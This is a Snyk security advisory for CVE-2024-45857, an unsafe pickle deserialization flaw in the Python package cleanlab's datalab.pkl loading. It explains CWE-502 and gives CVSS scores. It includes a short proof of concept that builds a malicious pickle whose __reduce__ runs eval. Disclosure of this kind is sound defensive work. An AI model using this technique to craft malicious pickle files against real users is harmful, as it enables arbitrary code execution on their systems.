Deserialization of Untrusted Data in cleanlab | CVE-2024-45857

Q: How to fix?

There is no fixed version for cleanlab .

Threat Intelligence

Proof of Concept

0.05% (16^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Deserialization of Untrusted Data vulnerabilities in an interactive lesson.

Start learning

Snyk IDSNYK-PYTHON-CLEANLAB-7945496
published13 Sept 2024
disclosed12 Sept 2024
creditKasimir Schulz

Report a new vulnerability Found a mistake?

Introduced: 12 Sep 2024

CVE-2024-45857 (opens in a new tab) CWE-502 (opens in a new tab)

How to fix?

There is no fixed version for cleanlab.

Overview

cleanlab is a The standard package for data-centric AI, machine learning with label errors, and automatically finding and fixing dataset issues in Python.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data via the deserialization process in the datalab.pkl file. An attacker can execute arbitrary code on the user's system by crafting a malicious datalab.pkl file and loading it into the application.

PoC

import pickle

class Exploit:
    def __reduce__(self):
        return (eval, ("print('pwned')",))
    
open("./exploit/datalab.pkl", "wb").write(pickle.dumps(Exploit()))

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.

References

CVSS Base Scores

version 4.0

version 3.1

Attack Vector (AV)
Local
Attack Complexity (AC)
Low
Attack Requirements (AT)
None
Privileges Required (PR)
None
User Interaction (UI)
Passive

Confidentiality (VC)
High
Integrity (VI)
High
Availability (VA)
High

Confidentiality (SC)
None
Integrity (SI)
None
Availability (SA)
None

Deserialization of Untrusted Data Affecting cleanlab package, versions [2.4.0,]

Severity